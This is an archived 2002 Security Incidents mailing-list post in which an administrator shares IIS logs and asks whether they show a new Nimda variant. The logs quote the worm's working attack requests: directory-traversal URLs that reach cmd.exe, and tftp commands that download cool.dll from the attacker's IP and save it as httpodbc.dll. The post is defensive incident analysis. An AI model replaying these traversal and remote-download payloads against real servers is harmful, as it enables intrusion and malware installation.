Security Incidents: Another Nimda attack??

Nmap Security Scanner

Intro

Ref Guide

Install Guide

Download

Changelog

Book

Docs
Security Lists

Bugtraq

Basics

More
Security Tools

More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

Security Incidents mailing list archives

Another Nimda attack??

From: "Eugene Chua Yew Gin" <chuayg () 1-net com sg>
Date: Tue, 17 Sep 2002 17:42:37 +0800



Hi, need some advice for the below log, can anyone advice if its are a pattern
of Nimda which I find it rather strange because it downloads cool.dll and
httpodbc.dll instead of Admin.dll.  Norton Antivirus reported a W32.Nimda.E () MM
(dr) virus, is it a new variant??

Thanks and regards.

2002-09-16 07:53:21 202.100.249.231 - xxxx 80 GET /scripts/root.exe /c+dir 404 -
2002-09-16 07:53:21 202.100.249.231 - xxxx 80 GET /MSADC/root.exe /c+dir 403 -
2002-09-16 07:53:23 202.100.249.231 - xxxx 80 GET /c/winnt/system32/cmd.exe
/c+dir 404 -
2002-09-16 07:53:23 202.100.249.231 - xxxx 80 GET /d/winnt/system32/cmd.exe
/c+dir 404 -
2002-09-16 07:53:25 202.100.249.231 - xxxx 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 200 -
2002-09-16 07:53:56 202.100.249.231 - xxxx 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+tftp%20-i%20202.100.249.231%20GET%20
cool.dll%20c:\httpodbc.dll 502 -
2002-09-16 07:54:24 202.100.249.231 - 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%20202.100.249.231%20GET%20cool.dll%20d:\httpodbc.dll 502 -
2002-09-16 07:54:51 202.100.249.231 - 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%20202.100.249.231%20GET%20cool.dll%20e:\httpodbc.dll 502 -
2002-09-16 07:54:53 202.100.249.231 - 80 GET /scripts/..%5c../httpodbc.dll - 500
-
2002-09-16 07:54:53 202.100.249.231 - 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 200 -
2002-09-16 07:54:54 202.100.249.231 - 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%20202.100.249.231%20GET%20cool.dll%20c:\httpodbc.dll 502 -
2002-09-16 07:54:54 202.100.249.231 - 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%20202.100.249.231%20GET%20cool.dll%20d:\httpodbc.dll 502 -
2002-09-16 07:54:55 202.100.249.231 - 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%20202.100.249.231%20GET%20cool.dll%20e:\httpodbc.dll 502 -
2002-09-16 07:54:55 202.100.249.231 - 80 GET
/_vti_bin/..%5c../..%5c../..%5c../httpodbc.dll - 500 -
2002-09-16 07:54:55 202.100.249.231 - 80 GET
/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 -
2002-09-16 07:54:57 202.100.249.231 - 80 GET
/msadc/..%5c../..%5c../..%5c/..

Á

../..

Á

../..

Á

../winnt/system32/cmd.exe /c+dir
403 -
2002-09-16 07:54:57 202.100.249.231 - 80 GET
/scripts/..

Á

../winnt/system32/cmd.exe /c+dir 500 -
2002-09-16 07:54:58 202.100.249.231 - 80 GET /scripts/winnt/system32/cmd.exe
/c+dir 404 -
2002-09-16 07:54:58 202.100.249.231 - 80 GET
/scripts/../../winnt/system32/cmd.exe /c+dir 200 -

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com

By Date By Thread

Current thread:

Another Nimda attack?? Eugene Chua Yew Gin (Sep 17)
- Re: Another Nimda attack?? Roger Thompson (Sep 18)